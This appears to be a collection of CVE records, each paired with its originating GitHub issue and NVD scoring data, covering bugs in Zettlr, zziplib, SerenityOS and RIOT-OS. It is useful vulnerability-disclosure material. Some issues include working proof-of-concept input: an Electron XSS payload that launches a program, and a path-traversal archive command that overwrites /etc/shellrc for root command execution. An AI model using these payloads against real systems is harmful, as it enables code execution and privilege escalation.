https://github.com/Zettlr/Zettlr/issues/1716
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Zettlr", "Zettlr" ]
## Description XSS leads to remote code execution ## Reproducing 1. Download the crafted .md file (https://drive.google.com/file/d/1j9p1bL75ezWIIRbg0hb65-02jIt2u8OX/view?usp=sharing) Or make the md file by yourself. Foo.md content: `<iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>` 2. Open the file with Zettlr 1.8.7Windows Version 3. Once the page refresh or you can click anywhere for refreshing, calculator pops up. <img width="958" alt="擷取" src="https://user-images.githubusercontent.com/64322368/107067023-ab291700-6819-11eb-8dea-45c56c4ab145.PNG"> ## Expected behaviour XSS payload shouldn't execute Set nodeIntregration as false ## Platform - OS and version: Windows 10 x64 - Zettlr Version: 1.8.7 ## Additional information
Cross-site scripting leads to Remote Code Execution
https://api.github.com/repos/Zettlr/Zettlr/issues/1716/comments
2
2021-02-05T17:23:04Z
2021-04-21T19:15:08Z
https://github.com/Zettlr/Zettlr/issues/1716
802,340,502
1,716
2,081
CVE-2020-18442
2021-06-18T15:15:08.227
Infinite Loop in zziplib v0.13.69 allows remote attackers to cause a denial of service via the return value "zzip_file_read" in the function "unzzip_cat_file".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gdraheim/zziplib/issues/68" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00021.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TCFYD46OY4VAGJ4UX7IFOH5SHD4UW4ZA/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VVANTEBDQGOIPC5KCEVAGA5KT4KKTGWB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gdraheim/zziplib/issues/68" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TCFYD46OY4VAGJ4UX7IFOH5SHD4UW4ZA/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VVANTEBDQGOIPC5KCEVAGA5KT4KKTGWB/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zziplib_project:zziplib:0.13.69:*:*:*:*:*:*:*", "matchCriteriaId": "82DA4CCB-B3C3-4298-9277-8C295AAAD14A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "835" ]
835
https://github.com/gdraheim/zziplib/issues/68
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gdraheim", "zziplib" ]
Hello, I found a bug of zziplib on the lastest commit b7747bc. It's in the function unzzip_cat_file (unzzipcat-zip.c:37) , and it is caused by incorrect handling of the return value of the function ‘zzip_fread’. Relevant code in function unzzip_cat_file in unzzipcat-zip.c: ```c static void unzzip_cat_file(ZZIP_DIR* disk, char* name, FILE* out) { ZZIP_FILE* file = zzip_file_open (disk, name, 0); if (file) { char buffer[1024]; int len; while ((len = zzip_file_read (file, buffer, 1024))) // Incorrect handling of the return value (-1) of the function zzip_file_read causes an infinite loop. { fwrite (buffer, 1, len, out); } zzip_file_close (file); } } ``` [POC.zip](https://github.com/gdraheim/zziplib/files/2931827/POC.zip) Using the POC file, I find that the function zzip_file_read returns -1. And it is handled incorrectly in the caller (unzzip_cat_file), which leads to an infinite loop. ```c zzip_ssize_t zzip_file_read(ZZIP_FILE * fp, void *buf, zzip_size_t len) { …… startlen = fp->d_stream.total_out; err = inflate(&fp->d_stream, Z_NO_FLUSH); if (err == Z_STREAM_END) { fp->restlen = 0; } else if (err == Z_OK) { fp->restlen -= (fp->d_stream.total_out - startlen); } else { dir->errcode = err; return -1; } // Return -1 when there is an error. …… } ```
error: Incorrect handling of function 'zzip_fread' return value
https://api.github.com/repos/gdraheim/zziplib/issues/68/comments
7
2019-03-05T16:45:19Z
2021-07-04T00:33:14Z
https://github.com/gdraheim/zziplib/issues/68
417,394,144
68
2,082
CVE-2021-31272
2021-06-18T22:15:11.833
SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3991" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3992" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713/commits/3844e8569689dd476064a0759d704bc64fb3ca2c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3991" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713/commits/3844e8569689dd476064a0759d704bc64fb3ca2c" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:*:*:*:*:*:*:*:*", "matchCriteriaId": "1AEEFCDA-F75F-4387-BC5A-30C99F3CFC38", "versionEndExcluding": "3844e8569689dd476064a0759d704bc64fb3ca2c", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/SerenityOS/serenity/issues/3991
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
``` $ cat shellrc /bin/id $ ./evilarc.py -f evil.tar.gz -o unix -p etc shellrc Creating evil.tar.gz containing ../../../../../../../../etc/shellrc ``` ![lol](https://user-images.githubusercontent.com/434827/98456555-2bb48900-21d3-11eb-882e-56e1278050a8.png) Most of the file system is mounted read-only. However, we can overwrite `/etc/shellrc` to gain privileges next time `root` uses `/bin/sh`.
tar: Directory traversal vulnerability may lead to command execution / privilege escalation
https://api.github.com/repos/SerenityOS/serenity/issues/3991/comments
17
2020-11-08T04:03:18Z
2021-03-10T01:28:18Z
https://github.com/SerenityOS/serenity/issues/3991
738,367,257
3,991
2,083
CVE-2021-31272
2021-06-18T22:15:11.833
SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3991" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3992" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713/commits/3844e8569689dd476064a0759d704bc64fb3ca2c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3991" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/3992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/pull/5713/commits/3844e8569689dd476064a0759d704bc64fb3ca2c" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:*:*:*:*:*:*:*:*", "matchCriteriaId": "1AEEFCDA-F75F-4387-BC5A-30C99F3CFC38", "versionEndExcluding": "3844e8569689dd476064a0759d704bc64fb3ca2c", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/SerenityOS/serenity/issues/3992
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
Same issue as #3991 in `tar`. ![lol](https://user-images.githubusercontent.com/434827/98456848-bd24fa80-21d5-11eb-949a-a50ea347cb82.png) This could also be used to gain command execution on the host, or elevate privileges to the `anon` user from a lower privileged user, in the event that `anon` extracts a malicious tar file. Command execution via `/etc/shellrc` (as `root`) or `/home/anon/.config/Terminal.ini` (as `anon`).
unzip: Directory traversal vulnerability may lead to command execution / privilege escalation
https://api.github.com/repos/SerenityOS/serenity/issues/3992/comments
3
2020-11-08T04:20:52Z
2023-11-07T00:16:58Z
https://github.com/SerenityOS/serenity/issues/3992
738,369,090
3,992
2,084
CVE-2021-31663
2021-06-18T22:15:11.970
RIOT-OS 2021.01 before commit bc59d60be60dfc0a05def57d74985371e4f22d79 contains a buffer overflow which could allow attackers to obtain sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/commit/bc59d60be60dfc0a05def57d74985371e4f22d79" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/15927" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/pull/15929" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/commit/bc59d60be60dfc0a05def57d74985371e4f22d79" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/15927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/pull/15929" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:riot-os:riot:2021.01:-:*:*:*:*:*:*", "matchCriteriaId": "21164D26-DC7F-423B-9832-2C4C494307E0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/RIOT-OS/RIOT/issues/15927
[ "Third Party Advisory" ]
github.com
[ "RIOT-OS", "RIOT" ]
#### Description I did some testing of the `uri_parser` module as provided in `sys/uri_parser`. I believe I discovered an edge-case where the parser performs an out-of-bounds read of the provided buffer. The code causing this is: https://github.com/RIOT-OS/RIOT/blob/9eb6a38a5adf55335f14e582834dad63610889d7/sys/uri_parser/uri_parser.c#L76-L80 which advances `result->host` without a bounds check and even if `userinfo_len` is zero `result->host` is still advanced by one byte. #### Steps to reproduce the issue Application code: ```C #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <uri_parser.h> #define BUFFER_SIZE 5 static char buf[] = { 65, 58, 47, 47, 64 }; int main(void) { size_t len = sizeof(buf); uri_parser_result_t result; uri_parser_process(&result, buf, len); return 0; } ``` Minimal `Makefile`: ```Makefile APPLICATION = uri DEVELHELP = 1 BOARD = native USEMODULE += uri_parser RIOTBASE ?= $(CURDIR)/../.. include $(RIOTBASE)/Makefile.include ``` Afterwards, compile as: $ make -C examples/uri all-asan And run the application using: $ make -C examples/uri term #### Expected results The application shouldn't crash. #### Actual results ``` main(): This is RIOT! (Version: 2021.04-devel-440-g4cc04) ================================================================= ==24259==ERROR: AddressSanitizer: global-buffer-overflow on address 0x565e6105 at pc 0x565dce2b bp 0x565eb6f8 sp 0x565eb6ec READ of size 1 at 0x565e6105 thread T0 #0 0x565dce2a in _consume_authority /root/RIOT/sys/uri_parser/uri_parser.c:130 #1 0x565dd5ed in _parse_absolute /root/RIOT/sys/uri_parser/uri_parser.c:222 #2 0x565ddabc in uri_parser_process /root/RIOT/sys/uri_parser/uri_parser.c:280 #3 0x565d3bcb in main /root/RIOT/examples/uri/main.c:15 #4 0x565d40ed in main_trampoline /root/RIOT/core/init.c:58 #5 0xf766353a in makecontext (/lib/i386-linux-gnu/libc.so.6+0x4153a) 0x565e6105 is located 0 bytes to the right of global variable 'buf' defined in '/root/RIOT/examples/uri/main.c:8:13' (0x565e6100) of size 5 SUMMARY: AddressSanitizer: global-buffer-overflow /root/RIOT/sys/uri_parser/uri_parser.c:130 in _consume_authority Shadow bytes around the buggy address: 0x2acbcbd0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x2acbcbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x2acbcbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x2acbcc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x2acbcc10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x2acbcc20:[05]f9 f9 f9 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 0x2acbcc30: f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 0x2acbcc40: 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x2acbcc50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x2acbcc60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 0x2acbcc70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==24259==ABORTING make: *** [/root/RIOT/examples/uri/../../Makefile.include:725: term] Error 1 make: Leaving directory '/root/RIOT/examples/uri' ``` #### Versions I don't think this is needed, if you need more information let me know.
uri_parser: out-of-bounds read
https://api.github.com/repos/RIOT-OS/RIOT/issues/15927/comments
2
2021-02-04T13:54:14Z
2021-02-05T16:06:02Z
https://github.com/RIOT-OS/RIOT/issues/15927
801,303,854
15,927
2,085
CVE-2021-33185
2021-06-18T22:15:12.033
SerenityOS contains a buffer overflow in the set_range test in TestBitmap which could allow attackers to obtain sensitive information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/7073" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SerenityOS/serenity/issues/7073" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:serenityos:serenityos:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0A631C0-3E3F-4FC9-8E7D-8843F0133B9C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/SerenityOS/serenity/issues/7073
[ "Third Party Advisory" ]
github.com
[ "SerenityOS", "serenity" ]
The set_range test in TestBitmap overflows the allocated bitmap in AK::BitmapView::count_in_range ```c++ { Bitmap bitmap(288, false); bitmap.set_range(48, 32, true); bitmap.set_range(94, 39, true); bitmap.set_range(190, 71, true); bitmap.set_range(190 + 71 - 7, 21, false); // slightly overlapping clear for (size_t i = 0; i < bitmap.size(); i++) { bool should_be_set = (i >= 48 && i < 48 + 32) || (i >= 94 && i < 94 + 39) || ((i >= 190 && i < 190 + 71) && !(i >= 190 + 71 - 7 && i < 190 + 71 - 7 + 21)); EXPECT_EQ(bitmap.get(i), should_be_set); } EXPECT_EQ(bitmap.count_slow(true), 32u + 39u + 71u - 7u); ///<--- overflows here } ``` <details> <summary> Test run with ASAN backtrace </summary> ``` 28/87 Test #28: TestBitmap_lagom .....................***Failed 0.03 sec Running test 'construct_empty'. Completed test 'construct_empty' in 0ms Running test 'find_first_set'. Completed test 'find_first_set' in 0ms Running test 'find_first_unset'. Completed test 'find_first_unset' in 0ms Running test 'find_one_anywhere_set'. Completed test 'find_one_anywhere_set' in 0ms Running test 'find_one_anywhere_unset'. Completed test 'find_one_anywhere_unset' in 0ms Running test 'find_first_range'. Completed test 'find_first_range' in 0ms Running test 'set_range'. ================================================================= ==15246==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000002f4 at pc 0x556364bf7d49 bp 0x7ffe4d613460 sp 0x7ffe4d613450 READ of size 1 at 0x6040000002f4 thread T0 #0 0x556364bf7d48 in AK::BitmapView::count_in_range(unsigned long, unsigned long, bool) const /home/andrew/serenity/Meta/Lagom/../../AK/BitmapView.h:67 #1 0x556364c038c6 in AK::Bitmap::count_in_range(unsigned long, unsigned long, bool) const /home/andrew/serenity/Meta/Lagom/../../AK/Bitmap.h:83 #2 0x556364c038c6 in AK::Bitmap::count_slow(bool) const /home/andrew/serenity/Meta/Lagom/../../AK/Bitmap.h:82 #3 0x556364c038c6 in __test_set_range /home/andrew/serenity/Tests/AK/TestBitmap.cpp:148 #4 0x556364ced2b3 in AK::Function<void ()>::operator()() const /home/andrew/serenity/Meta/Lagom/../../AK/Function.h:57 #5 0x556364ced2b3 in Test::TestSuite::run(AK::NonnullRefPtrVector<Test::TestCase, 0ul> const&) /home/andrew/serenity/Userland/Libraries/LibTest/TestSuite.cpp:118 #6 0x556364bd79d4 in Test::TestSuite::main(AK::String const&, int, char**) /home/andrew/serenity/Userland/Libraries/LibTest/TestSuite.cpp:81 #7 0x556364bd4502 in main /home/andrew/serenity/Userland/Libraries/LibTest/TestMain.cpp:25 #8 0x7fbc8c9350b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #9 0x556364bd859d in _start (/home/andrew/serenity/BuildLagom/TestBitmap_lagom+0x17b59d) 0x6040000002f4 is located 0 bytes to the right of 36-byte region [0x6040000002d0,0x6040000002f4) allocated by thread T0 here: #0 0x7fbc8d719517 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.6+0xb0517) #1 0x556364c026a1 in AK::Bitmap::Bitmap(unsigned long, bool) /home/andrew/serenity/Meta/Lagom/../../AK/Bitmap.h:29 #2 0x556364c026a1 in __test_set_range /home/andrew/serenity/Tests/AK/TestBitmap.cpp:137 #3 0x556364ced2b3 in AK::Function<void ()>::operator()() const /home/andrew/serenity/Meta/Lagom/../../AK/Function.h:57 #4 0x556364ced2b3 in Test::TestSuite::run(AK::NonnullRefPtrVector<Test::TestCase, 0ul> const&) /home/andrew/serenity/Userland/Libraries/LibTest/TestSuite.cpp:118 #5 0x556364bd79d4 in Test::TestSuite::main(AK::String const&, int, char**) /home/andrew/serenity/Userland/Libraries/LibTest/TestSuite.cpp:81 #6 0x556364bd4502 in main /home/andrew/serenity/Userland/Libraries/LibTest/TestMain.cpp:25 #7 0x7fbc8c9350b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/andrew/serenity/Meta/Lagom/../../AK/BitmapView.h:67 in AK::BitmapView::count_in_range(unsigned long, unsigned long, bool) const Shadow bytes around the buggy address: 0x0c087fff8000: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa 0x0c087fff8010: fa fa 00 00 00 00 07 fa fa fa 00 00 00 00 00 01 0x0c087fff8020: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 00 00 0x0c087fff8030: fa fa 00 00 00 00 00 01 fa fa 00 00 00 00 02 fa 0x0c087fff8040: fa fa 00 00 00 00 07 fa fa fa 00 00 00 00 07 fa =>0x0c087fff8050: fa fa fd fd fd fd fd fa fa fa 00 00 00 00[04]fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==15246==ABORTING ``` </details>
Tests: TestBitmap has heap-buffer-overflow in set_range test
https://api.github.com/repos/SerenityOS/serenity/issues/7073/comments
1
2021-05-13T07:29:03Z
2021-05-16T20:58:15Z
https://github.com/SerenityOS/serenity/issues/7073
890,807,040
7,073
2,086
CVE-2021-33186
2021-06-18T22:15:12.067
SerenityOS in test-crypto.cpp contains a stack buffer overflow which could allow attackers to obtain sensitive information.
